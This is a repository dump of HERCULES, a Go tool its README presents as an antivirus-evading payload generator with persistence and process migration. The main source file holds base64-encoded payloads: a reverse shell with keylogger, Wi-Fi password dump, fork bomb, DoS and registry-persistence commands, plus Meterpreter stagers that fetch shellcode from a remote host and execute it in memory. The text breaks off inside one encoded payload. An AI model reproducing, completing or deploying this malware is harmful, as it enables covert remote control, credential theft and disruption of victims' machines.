├── HERCULES ├── LICENSE ├── README.md ├── SOURCE ├── HERCULES.go └── Payloads │ ├── HERCULES REVERSE SHELL.go │ ├── Meterpreter_Reverse_HTTP_HTTPS.go │ └── Meterpreter_Reverse_TCP.go └── Setup.go /HERCULES: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd $HERCULES_PATH 4 | cd SOURCE 5 | ./HERCULES 6 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 Ege Balcı 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HERCULES [![License](https://img.shields.io/github/license/mashape/apistatus.svg?maxAge=2592000)](https://raw.githubusercontent.com/EgeBalci/HERCULES/master/LICENSE) [![Support](https://img.shields.io/badge/Support-Mail-red.svg)](https://github.com/EgeBalci/HERCULES/wiki) [![Golang](https://img.shields.io/badge/Go-1.6-blue.svg)](https://golang.org) 2 | 3 | HERCULES is a customizable payload generator that can bypass antivirus software. 4 | 5 | 6 | VERSION 3.0.5 7 | 8 | 9 | ![](http://i.imgur.com/SMU8WU4.png) 10 | 11 | 12 | #INSTALLATION 13 | 14 | SUPPORTED PLATFORMS: 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 |

Operative system	Version
Ubuntu	16.04 / 15.10
Kali linux	Rolling / Sana
Manjaro	*
Arch Linux	*
Black Arch	*
Parrot OS	3.1

46 | 47 | go get github.com/fatih/color 48 | go run Setup.go 49 | 50 | WARNING: Don't change the location of the HERCULES folder. 51 | 52 | #USAGE 53 | 54 | HERCULES 55 | 56 | 57 | #SPECIAL FUNCTIONS 58 | 59 | 60 | Persistence : Persistence function adds the running binary to windows start-up registry (CurrentVersion/Run) for continuous access. 61 | 62 | Migration : This function triggers a loop that tries to migrate to a remote process until it is successfully migrated. 63 | 64 | #WHAT IS UPX ? 65 | 66 | UPX (Ultimate Packer for Executables) is a free and open source executable packer supporting a number of file formats from different operating systems. UPX simply takes the binary file and compresses it, packed binary unpack(decompress) itself at runtime to memory. 67 | 68 | #WHAT IS "AV EVASION SCORE" ? 69 | 70 | AV Evasion Score is a scale(1/10) for determining the effectiveness of the payloads anti virus bypassing capabilities, 1 represents low possibility to pass AV softwares. 71 | 72 | Using special functions and packing the payloads with upx decreases the AV Evasion Score. 73 | 74 | ![](http://i.imgur.com/8L1wmjo.png) 75 | 76 | ![](http://i.imgur.com/N2bhpR9.jpg) 77 | 78 | Bitcoin: 16GvMV7eZH22p4rLQuu8h2gbgSLYr11KBM 79 | 80 | 81 | #COMING SOON... 82 | 83 | - Binary infector 84 | - Bypass AV functon 85 | - AES payload encryption 86 | - OSX support 87 | 88 | 89 | -------------------------------------------------------------------------------- /SOURCE/HERCULES.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | 4 | import "strings" 5 | import "fmt" 6 | import "os" 7 | import "time" 8 | import "strconv" 9 | import "net/http" 10 | import "io/ioutil" 11 | import "os/exec" 12 | import "encoding/base64" 13 | import "github.com/fatih/color" 14 | 15 | 16 | const VERSION string = "3.0.5" 17 | 18 | var HERCULES_REVERSE_SHELL string = "cGFja2FnZSBtYWluCgppbXBvcnQgIm5ldCIKaW1wb3J0ICJvcy9leGVjIgppbXBvcnQgImJ1ZmlvIgppbXBvcnQgInN0cmluZ3MiCmltcG9ydCAic3lzY2FsbCIKaW1wb3J0ICJ0aW1lIgppbXBvcnQgIkVHRVNQTE9JVCIKCgoKY29uc3QgSVAgc3RyaW5nID0gIjEwLjEwLjEwLjg0Igpjb25zdCBQT1JUIHN0cmluZyA9ICI1NTU1IgoKY29uc3QgQkFDS0RPT1IgYm9vbCA9IGZhbHNlOwpjb25zdCBFTUJFRERFRCBib29sID0gZmFsc2U7CmNvbnN0IFRJTUVfREVMQVkgdGltZS5EdXJhdGlvbiA9IDU7Ly9TZWNvbmQKCmNvbnN0IEI2NF9CSU5BUlkgc3RyaW5nID0gIi8vSU5TRVJULUJJTkFSWS1IRVJFLy8iCmNvbnN0IEJJTkFSWV9OQU1FIHN0cmluZyA9ICJ3aW51cGR0LmV4ZSIKCnZhciBHTE9CQUxfQ09NTUFORCBzdHJpbmc7CnZhciBQQVJBTUVURVJTIHN0cmluZzsKdmFyIEtleUxvZ3Mgc3RyaW5nOwoKCgpmdW5jIG1haW4oKSB7CgoKICBpZiBFTUJFRERFRCA9PSB0cnVlIHsKICAgIEVHRVNQTE9JVC5EaXNwYXRjaChCNjRfQklOQVJZLCBCSU5BUllfTkFNRSwgUEFSQU1FVEVSUykKICB9CgoKICBpZiBCQUNLRE9PUiA9PSB0cnVlIHsKICAgIEVHRVNQTE9JVC5QZXJzaXN0ZW5jZSgpCiAgfQoKICBjb25uZWN0LCBlcnIgOj0gbmV0LkRpYWwoInRjcCIsIElQKyI6IitQT1JUKTsKICBpZiBlcnIgIT0gbmlsIHsKICAgIHRpbWUuU2xlZXAoVElNRV9ERUxBWSp0aW1lLlNlY29uZCk7CiAgICBtYWluKCk7CiAgfTsKCgoKICBEaXIsIFZlcnNpb24sIFVzZXJuYW1lLCBBViA6PSBFR0VTUExPSVQuU3lzZ3VpZGUoKQogIFN5c0d1aWRlIDo9IChCQU5ORVIgKyAiIyBTWVNHVUlERVxuIiArICJ8IiArIHN0cmluZyhWZXJzaW9uKSArICJ8XG58XG5+PiBVc2VyIDogIiArIHN0cmluZyhVc2VybmFtZSkgKyAiXG58XG58XG5+PiBBViA6ICIgKyBzdHJpbmcoQVYpICArICJcblxuXG4iICsgc3RyaW5nKERpcikgKyAiPiIpCiAgY29ubmVjdC5Xcml0ZShbXWJ5dGUoc3RyaW5nKFN5c0d1aWRlKSkpOwoKCgogIGZvciB7CgogICAgQ29tbWFuZCwgXyA6PSBidWZpby5OZXdSZWFkZXIoY29ubmVjdCkuUmVhZFN0cmluZygnXG4nKTsKICAgIF9Db21tYW5kIDo9IHN0cmluZyhDb21tYW5kKTsKICAgIEdMT0JBTF9DT01NQU5EID0gX0NvbW1hbmQ7CgoKCiAgICBpZiBzdHJpbmdzLkNvbnRhaW5zKF9Db21tYW5kLCAifnBsZWFzZSIpIHx8IHN0cmluZ3MuQ29udGFpbnMoX0NvbW1hbmQsICJ+UExFQVNFIikgewogICAgICBjb25uZWN0LldyaXRlKFtdYnl0ZShFR0VTUExPSVQuUGxlYXNlKEdMT0JBTF9DT01NQU5EKSkpOwogICAgfWVsc2UgaWYgc3RyaW5ncy5Db250YWlucyhfQ29tbWFuZCwgIn5NRVRFUlBSRVRFUiIpIHx8IHN0cmluZ3MuQ29udGFpbnMoX0NvbW1hbmQsICJ+bWV0ZXJwcmV0ZXIiKSB7CiAgICAgIFRlbXBfQWRkcmVzcyA6PSBzdHJpbmdzLlNwbGl0KF9Db21tYW5kLCAiXCIiKS8vfm1ldGVycHJldGVyIC0tdGNwICIxMjcuMC4wLjE6NDQ0NCIKICAgICAgQWRkcmVzcyA6PSBzdHJpbmcoVGVtcF9BZGRyZXNzWzFdKQogICAgICBDb25UeXBlIDo9IHN0cmluZ3MuU3BsaXQoX0NvbW1hbmQsICIgIikKICAgICAgQ29uVHlwZVsxXSA9IHN0cmluZ3MuVHJpbVByZWZpeChDb25UeXBlWzFdLCAiLS0iKQogICAgICBFR0VTUExPSVQuTWV0ZXJwcmV0ZXIoQ29uVHlwZVsxXSwgQWRkcmVzcykKICAgICAgY29ubmVjdC5Xcml0ZShbXWJ5dGUoIlxuXG5bK10gTWV0ZXJwcmV0ZXIgRXhlY3V0ZWQgIVxuXG4iK0RpcisiPiIpKTsKICAgIH1lbHNlIGlmIHN0cmluZ3MuQ29udGFpbnMoX0NvbW1hbmQsICJ+TUlHUkFURSIpIHx8IHN0cmluZ3MuQ29udGFpbnMoX0NvbW1hbmQsICJ+bWlncmF0ZSIpIHsKICAgICAgVGVtcF9BZGRyZXNzIDo9IHN0cmluZ3MuU3BsaXQoX0NvbW1hbmQsICJcIiIpLy9+bWlncmF0ZSAiMTI3LjAuMC4xOjQ0NDQiIDEyMTIKICAgICAgQWRkcmVzcyA6PSBzdHJpbmcoVGVtcF9BZGRyZXNzWzFdKQogICAgICBQaWQgOj0gc3RyaW5ncy5TcGxpdChfQ29tbWFuZCwgIiAiKQogICAgICBSZXN1bHQsIEVycm9yIDo9IEVHRVNQTE9JVC5NaWdyYXRlKFBpZFsyXSwgQWRkcmVzcykKICAgICAgaWYgUmVzdWx0ID09IHRydWUgewogICAgICAgICAgY29ubmVjdC5Xcml0ZShbXWJ5dGUoIlxuXG5bK10gU3VjY2VzZnVsbHkgTWlncmF0ZWQgIVxuXG4iK0RpcisiPiIpKTsKICAgICAgfWVsc2V7CiAgICAgICAgY29ubmVjdC5Xcml0ZShbXWJ5dGUoIlxuXG4iK0Vycm9yKyJcblxuIitEaXIrIj4iKSk7CiAgICAgIH0KICAgIH1lbHNlIGlmIHN0cmluZ3MuQ29udGFpbnMoX0NvbW1hbmQsICJ+RE9TIikgfHwgc3RyaW5ncy5Db250YWlucyhfQ29tbWFuZCwgIn5kb3MiKSB7CiAgICAgIERPU19Db21tYW5kIDo9IHN0cmluZ3MuU3BsaXQoR0xPQkFMX0NPTU1BTkQsICJcIiIpCiAgICAgIHZhciBET1NfVGFyZ2V0IHN0cmluZyA9ICBET1NfQ29tbWFuZFsxXQogICAgICBpZiBzdHJpbmdzLkNvbnRhaW5zKHN0cmluZyhET1NfVGFyZ2V0KSwgImh0dHAiKSB7CiAgICAgICAgZ28gRUdFU1BMT0lULkRvcyhET1NfVGFyZ2V0KTsKICAgICAgICBjb25uZWN0LldyaXRlKFtdYnl0ZSgiXG5cblsqXSBTdGFydGluZyBET1MgYXRhY2suLi4iKyJcblxuWypdIFNlbmRpbmcgMTAwMCByZXF1ZXN0IHRvICIrRE9TX1RhcmdldCsiICFcblxuIitEaXIrIj4iKSk7CiAgICAgIH1lbHNlewogICAgICAgIGNvbm5lY3QuV3JpdGUoW11ieXRlKCJcblxuWy1dIEVSUk9SOiBJbnZhbGlkIHVybCAhXG5cbiIrRGlyKyI+IikpOwogICAgICB9CiAgICB9ZWxzZSBpZiBzdHJpbmdzLkNvbnRhaW5zKF9Db21tYW5kLCAifkRJU1RSQUNUIikgfHwgc3RyaW5ncy5Db250YWlucyhfQ29tbWFuZCwgIn5kaXN0cmFjdCIpIHsKICAgICAgRUdFU1BMT0lULkRpc3RyYWNrdCgpOwogICAgfWVsc2UgaWYgc3RyaW5ncy5Db250YWlucyhfQ29tbWFuZCwgIn5LRVlMT0dHRVItREVQTE9ZIikgfHwgc3RyaW5ncy5Db250YWlucyhfQ29tbWFuZCwgIn5rZXlsb2dnZXItZGVwbG95IikgfHwgc3RyaW5ncy5Db250YWlucyhfQ29tbWFuZCwgIn5LZXlsb2dnZXItRGVwbG95Iil7CiAgICAgIGdvIEVHRVNQTE9JVC5LZXlsb2dnZXIoJktleUxvZ3MpOwogICAgICAgY29ubmVjdC5Xcml0ZShbXWJ5dGUoc3RyaW5nKCJcblsqXSBLZXlsb2dnZXIgZGVwbG95IGNvbXBsZXRlZFxuIiArICJcbiIgKyBzdHJpbmcoRGlyKSArICI+IikpKTsKICAgIH1lbHNlIGlmIHN0cmluZ3MuQ29udGFpbnMoX0NvbW1hbmQsICJ+S0VZTE9HR0VSLURVTVAiKSB8fCBzdHJpbmdzLkNvbnRhaW5zKF9Db21tYW5kLCAifmtleWxvZ2dlci1kdW1wIikgfHwgc3RyaW5ncy5Db250YWlucyhfQ29tbWFuZCwgIn5LZXlsb2dnZXItRHVtcCIpewogICAgICBEdW1wX091dHB1dCA6PSBzdHJpbmcoIiMjIyMjIyMjIyMjIyMjIyMjIyBLRVlMT0dHRVIgRFVNUCAjIyMjIyMjIyMjIyMjIyMjIyMiICsgIlxuXG4iICsgc3RyaW5nKEtleUxvZ3MpICsgIlxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyIgKyAiXG4iK3N0cmluZyhEaXIpKyI+Iik7CiAgICAgIGNvbm5lY3QuV3JpdGUoW11ieXRlKER1bXBfT3V0cHV0KSk7CiAgICB9ZWxzZSBpZiBzdHJpbmdzLkNvbnRhaW5zKF9Db21tYW5kLCAifldJRkktTElTVCIpIHx8IHN0cmluZ3MuQ29udGFpbnMoX0NvbW1hbmQsICJ+d2lmaS1saXN0IikgewogICAgICBMaXN0IDo9IEVHRVNQTE9JVC5XaWZpTGlzdCgpOwogICAgICBjb25uZWN0LldyaXRlKFtdYnl0ZShzdHJpbmcoTGlzdCkpKTsKICAgIH1lbHNlIGlmIHN0cmluZ3MuQ29udGFpbnMoX0NvbW1hbmQsICJ+SEVMUCIpIHx8IHN0cmluZ3MuQ29udGFpbnMoX0NvbW1hbmQsICJ+aGVscCIpIHsKICAgICAgY29ubmVjdC5Xcml0ZShbXWJ5dGUoc3RyaW5nKEhFTFArRGlyKyI+IikpKTsKICAgIH1lbHNlIGlmIHN0cmluZ3MuQ29udGFpbnMoX0NvbW1hbmQsICJ+UEVSU0lTVEVOQ0UiKSB8fCBzdHJpbmdzLkNvbnRhaW5zKF9Db21tYW5kLCAifnBlcnNpc3RlbmNlIikgewogICAgICBnbyBFR0VTUExPSVQuUGVyc2lzdGVuY2UoKTsKICAgICAgY29ubmVjdC5Xcml0ZShbXWJ5dGUoIlxuXG5bKl0gQWRkaW5nIHBlcnNpc3RlbmNlIHJlZ2lzdHJpZXMuLi5cblsqXSBQZXJzaXN0ZW5jZSBDb21wbGV0ZWRcblxuIiArIHN0cmluZyhEaXIpICsiPiIpKTsKICAgIH1lbHNlewogICAgICBjbWQgOj0gZXhlYy5Db21tYW5kKCJjbWQiLCAiL0MiLCBfQ29tbWFuZCk7CiAgICAgIGNtZC5TeXNQcm9jQXR0ciA9ICZzeXNjYWxsLlN5c1Byb2NBdHRye0hpZGVXaW5kb3c6IHRydWV9OwogICAgICBvdXQsIF8gOj0gY21kLk91dHB1dCgpOwogICAgICBDb21tYW5kX091dHB1dCA6PSBzdHJpbmcoIlxuXG4iK3N0cmluZyhvdXQpKyJcbiIrc3RyaW5nKERpcikrIj4iKTsKICAgICAgY29ubmVjdC5Xcml0ZShbXWJ5dGUoQ29tbWFuZF9PdXRwdXQpKTsKICAgIH07CiAgfTsKfTsKCgoKCgoKdmFyIEJBTk5FUiBzdHJpbmcgPSBgCiAgICAgICAgICAgICAgICAgIF9fICBfX19fX19fX19fX18gIF9fX19fX19fICBfX19fICAgIF9fX19fX19fX19fCiAgICAgICAgICAgICAgICAgLyAvIC8gLyBfX19fLyBfXyBcLyBfX19fLyAvIC8gLyAvICAgLyBfX19fLyBfX18vCiAgICAgICAgICAgICAgICAvIC9fLyAvIF9fLyAvIC9fLyAvIC8gICAvIC8gLyAvIC8gICAvIF9fLyAgXF9fIFwKICAgICAgICAgICAgICAgLyBfXyAgLyAvX19fLyBfLCBfLyAvX19fLyAvXy8gLyAvX19fLyAvX19fIF9fXy8gLwogICAgICAgICAgICAgIC9fLyAvXy9fX19fXy9fLyB8X3xcX19fXy9cX19fXy9fX19fXy9fX19fXy8vX19fXy8KCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIEhFUkNVTEVTIFJFVkVSU0UgU0hFTEwgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwpgCgoKCgp2YXIgSEVMUCBzdHJpbmcgPSBgCgogICAgICAgICAgICAgICAgICBfXyAgX19fX19fX19fX19fICBfX19fX19fXyAgX19fXyAgICBfX19fX19fX19fXwogICAgICAgICAgICAgICAgIC8gLyAvIC8gX19fXy8gX18gXC8gX19fXy8gLyAvIC8gLyAgIC8gX19fXy8gX19fLwogICAgICAgICAgICAgICAgLyAvXy8gLyBfXy8gLyAvXy8gLyAvICAgLyAvIC8gLyAvICAgLyBfXy8gIFxfXyBcCiAgICAgICAgICAgICAgIC8gX18gIC8gL19fXy8gXywgXy8gL19fXy8gL18vIC8gL19fXy8gL19fXyBfX18vIC8KICAgICAgICAgICAgICAvXy8gL18vX19fX18vXy8gfF98XF9fX18vXF9fX18vX19fX18vX19fX18vL19fX18vCgoKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBIRVJDVUxFUyBSRVZFUlNFIFNIRUxMICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwoKCgp+UEVSU1NJU1RFTkNFICAgICAgICAgICAgICAgICAgICAgICAgIEluc3RhbGxzIGEgcGVyc2lzdGVuY2UgbW9kdWxlIGZvciBjb250aW5pb3VzIGFjY2VzCgp+RElTVFJBQ1QgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEV4ZWN1dGVzIGEgZm9yayBib21iIGJhdCBmaWxlIGZvciBkaXN0cmFjdGlvbgoKflBMRUFTRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBc2tzIHVzZXJzIGNvbWZpcm1hdGlvbiBmb3IgaGlnaGVyIHByaXZpbGlkZ2Ugb3BlcmF0aW9ucwoKfkRPUyAtQSAid3d3LnRhcmdldHNpdGUuY29tIiAgICAgICAgICBTdGFydHMgYSBkZW5pYWwgb2Ygc2VydmljZSBhdGFjawoKfldJRkktTElTVCAJCQkJCQkgICAgICAgICAgICAgICAgRHVtcHMgYWxsIHdpZmkgaGlzdG9yeSBkYXRhIHdpdGggcGFzc3dvcmRzCgp+TUVURVJQUkVURVIgLS1odHRwICIxMC4wLjAuMTo0NDQ0IiAgIENyZWF0ZXMgYSBtZXRlcnByZXRlciBjb25uZWN0aW9uIHRvIG1ldGFzcGxvaXQgKGh0dHAvaHR0cHMvdGNwKQoKfktFWUxPR0dFUi1ERVBMT1kgICAgICAgICAgICAgICAgICAgICBJbnN0YWxscyBhIGtleWxvZ2dlciBtb2R1bGUgYW5kIGxvZ3MgYWxsIGtleXN0cm9rZXMKCn5LRVlMT0dHRVItRFVNUCAgICAgICAgICAgICAgICAgICAgICAgRHVtcHMgYWxsIGxvZ2VkIGtleXN0cm9rZXMKCn5NSUdSQVRFICIxMC4wLjAuMTo0NDQ0IiAyMjIyICAgICAgICAgQ3JlYXRlcyBhIHJldmVyc2UgaHR0cCBtZXRlcnByZXRlciBzZXNzaW9uIGF0IGdpdmVuIHBpZCAoRVhQRVJJTUVOVEFMKQoKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCgpgCg==" 19 | var METERPRETER_TCP string = "cGFja2FnZSBtYWluCgoKaW1wb3J0ICJlbmNvZGluZy9iaW5hcnkiCmltcG9ydCAic3lzY2FsbCIKaW1wb3J0ICJ1bnNhZmUiCi8vaW1wb3J0ICJFR0VTUExPSVQvUlNFIgoKY29uc3QgTUVNX0NPTU1JVCAgPSAweDEwMDAKY29uc3QgTUVNX1JFU0VSVkUgPSAweDIwMDAKY29uc3QgUEFHRV9BbGxvY2F0ZVVURV9SRUFEV1JJVEUgID0gMHg0MAoKCnZhciBLMzIgPSBzeXNjYWxsLk5ld0xhenlETEwoImtlcm5lbDMyLmRsbCIpCnZhciBWaXJ0dWFsQWxsb2MgPSBLMzIuTmV3UHJvYygiVmlydHVhbEFsbG9jIikKCgpmdW5jIEFsbG9jYXRlKFNoZWxsY29kZSB1aW50cHRyKSAodWludHB0cikgewoKCUFkZHIsIF8sIF8gOj0gVmlydHVhbEFsbG9jLkNhbGwoMCwgU2hlbGxjb2RlLCBNRU1fUkVTRVJWRXxNRU1fQ09NTUlULCBQQUdFX0FsbG9jYXRlVVRFX1JFQURXUklURSkKCWlmIEFkZHIgPT0gMCB7CgkJbWFpbigpCgl9CglyZXR1cm4gQWRkcgp9CgpmdW5jIG1haW4oKSB7CgkvL1JTRS5QZXJzaXN0ZW5jZSgpCgl2YXIgV1NBX0RhdGEgc3lzY2FsbC5XU0FEYXRhCglzeXNjYWxsLldTQVN0YXJ0dXAodWludDMyKDB4MjAyKSwgJldTQV9EYXRhKQoJU29ja2V0LCBfIDo9IHN5c2NhbGwuU29ja2V0KHN5c2NhbGwuQUZfSU5FVCwgc3lzY2FsbC5TT0NLX1NUUkVBTSwgMCkKCVNvY2tldF9BZGRyIDo9IHN5c2NhbGwuU29ja2FkZHJJbmV0NHtQb3J0OiA1NTU1LCBBZGRyOiBbNF1ieXRlezEyNywwLDAsMX19CglzeXNjYWxsLkNvbm5lY3QoU29ja2V0LCAmU29ja2V0X0FkZHIpCgl2YXIgTGVuZ3RoIFs0XWJ5dGUKCVdTQV9CdWZmZXIgOj0gc3lzY2FsbC5XU0FCdWZ7TGVuOiB1aW50MzIoNCksIEJ1ZjogJkxlbmd0aFswXX0KCVVpdG5aZXJvXzEgOj0gdWludDMyKDApCglEYXRhUmVjZWl2ZWQgOj0gdWludDMyKDApCglzeXNjYWxsLldTQVJlY3YoU29ja2V0LCAmV1NBX0J1ZmZlciwgMSwgJkRhdGFSZWNlaXZlZCwgJlVpdG5aZXJvXzEsIG5pbCwgbmlsKQoJTGVuZ3RoX2ludCA6PSBiaW5hcnkuTGl0dGxlRW5kaWFuLlVpbnQzMihMZW5ndGhbOl0pCglpZiBMZW5ndGhfaW50IDwgMTAwIHsKCQltYWluKCkKCX0KCVNoZWxsY29kZV9CdWZmZXIgOj0gbWFrZShbXWJ5dGUsIExlbmd0aF9pbnQpCgoJdmFyIFNoZWxsY29kZSBbXWJ5dGUKCVdTQV9CdWZmZXIgPSBzeXNjYWxsLldTQUJ1ZntMZW46IExlbmd0aF9pbnQsIEJ1ZjogJlNoZWxsY29kZV9CdWZmZXJbMF19CglVaXRuWmVyb18xID0gdWludDMyKDApCglEYXRhUmVjZWl2ZWQgPSB1aW50MzIoMCkKCVRvdGFsRGF0YVJlY2VpdmVkIDo9IHVpbnQzMigwKQoJZm9yIFRvdGFsRGF0YVJlY2VpdmVkIDwgTGVuZ3RoX2ludCB7CgkJc3lzY2FsbC5XU0FSZWN2KFNvY2tldCwgJldTQV9CdWZmZXIsIDEsICZEYXRhUmVjZWl2ZWQsICZVaXRuWmVyb18xLCBuaWwsIG5pbCkKCQlmb3IgaSA6PSAwOyBpIDwgaW50KERhdGFSZWNlaXZlZCk7IGkrKyB7CgkJCVNoZWxsY29kZSA9IGFwcGVuZChTaGVsbGNvZGUsIFNoZWxsY29kZV9CdWZmZXJbaV0pCgkJfQoJCVRvdGFsRGF0YVJlY2VpdmVkICs9IERhdGFSZWNlaXZlZAoJfQoKCUFkZHIgOj0gQWxsb2NhdGUodWludHB0cihMZW5ndGhfaW50ICsgNSkpCglBZGRyUHRyIDo9ICgqWzk5MDAwMF1ieXRlKSh1bnNhZmUuUG9pbnRlcihBZGRyKSkKCVNvY2tldFB0ciA6PSAodWludHB0cikodW5zYWZlLlBvaW50ZXIoU29ja2V0KSkKCUFkZHJQdHJbMF0gPSAweEJGCglBZGRyUHRyWzFdID0gYnl0ZShTb2NrZXRQdHIpCglBZGRyUHRyWzJdID0gMHgwMAoJQWRkclB0clszXSA9IDB4MDAKCUFkZHJQdHJbNF0gPSAweDAwCglmb3IgQnB1QUtySnhmbCwgSUluZ2FjTWFCaCA6PSByYW5nZSBTaGVsbGNvZGUgewoJCUFkZHJQdHJbQnB1QUtySnhmbCs1XSA9IElJbmdhY01hQmgKCX0KCS8vUlNFLk1pZ3JhdGUoQWRkciwgaW50KExlbmd0aF9pbnQpKQoJc3lzY2FsbC5TeXNjYWxsKEFkZHIsIDAsIDAsIDAsIDApCn0KCi8qCgoxLiBDcmVhdGUgV1NBIERBVEEgdmVyc2lvbiAyLjIKMi4gQ3JlYXRlIGEgV1NBIFNvY2tldAozLiBDcmVhdGUgV1NBIFNvY2tldCBBZGRyZXNzIG9iamVjdAo0LiBDb25uZWN0CjUuIENyZWF0ZSA0IGJ5dGUgc2Vjb25kIHN0YWdlIGxlbmd0aCBhcnJheQo2LiBDcmVhdGUgYSBXU0EgQnVmZmVyIG9iamVjdCBwb2ludGluZyBzZWNvbmQgc3RhZ2UgbGVuZ3RoIGFycmF5CjcuIFJlY2VpdmUgNCBieXRlcyBXU0FSZWN2IHRvIHNlY29uZCBzdGFnZSBsZW5ndGggYXJyYXkKOC4gQ29udmVydCBzZWNvbmQgc3RhZ2UgbGVuZ3RoIHRvIGludAo5LiBDcmVhdGUgYSBieXRlIGFycmF5IGF0IHRoZSBzaXplIG9mIHNlY29uZCBzdGFnZSBieXRlIGFycmF5IGZvciBzZWNvbmQgc3RhZ2Ugc2hlbGxjb2RlCjEwLiBDcmVhdGUgYSB1bmRlZmluZWQgYnl0ZSBhcnJheQoxMS4gQ3JlYXRlIGFub3RoZXIgV1NBIGJ1ZmZlciBvYmplY3QgcG9pbnRpbmcgYXQgc2Vjb25kIHN0YWdlIHNoZWxsY29kZSBieXRlIGFycmF5CjEyLiBDb25zdHJ1Y3QgYSBuZXN0ZWQgZm9yIGxvb3AgdGhhdCByZWNlaXZlcyBieXRlcyBhbmQgYXBwZW5kcyB0aGVtIGludG8gdW5kZWZpbmVkIGJ5dGUgYXJyYXkKMTMuIEFsbG9jYXRlIHNwYWNlIGluIG1lbW9yeSBhdCB0aGUgc2l6ZSBvZiAoc2Vjb25kIHN0YWdlIHNoZWxsY29kZSArIDUpCjE0LiBDcmVhdGUgYSBwb2ludGVyIHRoYXQgcG9pbnRzIHRvIFdTQSBTb2NrZXQKMTUuIEFzc2luZyAweEJGKG1vdiBlZGkpIHRvIGZpc3QgYnl0ZSBvZiBhbGxvY2F0ZWQgbWVtb3J5CjE2LiBBc3NpbmcgV1NBIFNvY2tldCBwb2ludGVyIHRvIHNlY29uZCBieXRlIG9mIGFsbG9jYXRlZCBtZW1vcnkKMTcuIEFzc2luZyB0cmVlIG51bGwgYnl0ZXMgYWZ0ZXIgc2Vjb25kIGJ5dGUgb2YgYWxsb2NhdGVkIG1lbW9yeQoxOC4gTW92ZSBzaGVsbGNvZGUgYnl0ZXMgdG8gYWxsb2NhdGVkIG1lbW9yeSBzdGFydGluZyBhdCBmaWZ0IGJ5dGUKMTkuIE1ha2UgYSBzeXNjYWxsIHRvIGFsbG9jYXRlZCBtZW1vcnkgYWRkcmVzcwoqLwo=" 20 | var METERPRETER_HTTP_HTTPS string = "cGFja2FnZSBtYWluCgppbXBvcnQgIm5ldC9odHRwIgppbXBvcnQgInN5c2NhbGwiCmltcG9ydCAidW5zYWZlIgppbXBvcnQgImlvL2lvdXRpbCIKLy9pbXBvcnQgIkVHRVNQTE9JVC9SU0UiCgoKCmNvbnN0IE1FTV9DT01NSVQgID0gMHgxMDAwCmNvbnN0IE1FTV9SRVNFUlZFID0gMHgyMDAwCmNvbnN0IFBBR0VfQWxsb2NhdGVVVEVfUkVBRFdSSVRFICA9IDB4NDAKCnZhciBLMzIgPSBzeXNjYWxsLk5ld0xhenlETEwoImtlcm5lbDMyLmRsbCIpCnZhciBWaXJ0dWFsQWxsb2MgPSBLMzIuTmV3UHJvYygiVmlydHVhbEFsbG9jIikKdmFyIEFkZHJlc3Mgc3RyaW5nID0gImh0dHA6Ly8xMjcuMC4wLjE6ODA4MC8iCnZhciBDaGVja3N1bSBzdHJpbmcgPSAiMTAyMDExYjd0eHBsNzFuIgoKCgpmdW5jIG1haW4oKSB7CiAgLy9SU0UuUGVyc2lzdGVuY2UoKQogIEFkZHJlc3MgKz0gQ2hlY2tzdW0KICBSZXNwb25zZSwgZXJyIDo9IGh0dHAuR2V0KEFkZHJlc3MpCiAgaWYgZXJyICE9IG5pbCB7CiAgICBtYWluKCkKICB9CiAgU2hlbGxjb2RlLCBfIDo9IGlvdXRpbC5SZWFkQWxsKFJlc3BvbnNlLkJvZHkpCgogIEFkZHIsIF8sIGVyciA6PSBWaXJ0dWFsQWxsb2MuQ2FsbCgwLCB1aW50cHRyKGxlbihTaGVsbGNvZGUpKSwgTUVNX1JFU0VSVkV8TUVNX0NPTU1JVCwgUEFHRV9BbGxvY2F0ZVVURV9SRUFEV1JJVEUpCiAgaWYgQWRkciA9PSAwIHsKICAgIG1haW4oKQogIH0KICBBZGRyUHRyIDo9ICgqWzk5MDAwMF1ieXRlKSh1bnNhZmUuUG9pbnRlcihBZGRyKSkKICBmb3IgaSA6PSAwOyBpIDwgbGVuKFNoZWxsY29kZSk7IGkrKyB7CiAgICBBZGRyUHRyW2ldID0gU2hlb